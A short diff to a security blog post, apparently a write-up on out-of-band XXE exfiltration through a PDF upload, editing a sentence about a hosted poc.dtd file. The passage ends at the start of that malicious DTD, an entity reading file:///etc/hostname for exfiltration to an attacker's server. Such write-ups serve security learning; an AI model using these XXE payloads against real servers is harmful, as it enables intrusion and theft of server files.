saurinn/saurinn.github.com/src/pages/blog/xxe-oob-via-a-pdf-upload.md

 At this point, the vulnerable server makes an outbound HTTP request to the attacker's server to download poc.dtd.

-The <b>poc.dtd</b> file, hosted on the attacker's server, contains the actual exfiltration code:
+The <b>poc.dtd</b> file (2nd. payload), hosted on the attacker's server, contains the actual exfiltration code:

 ```xml
 <!ENTITY % file SYSTEM "file:///etc/hostname">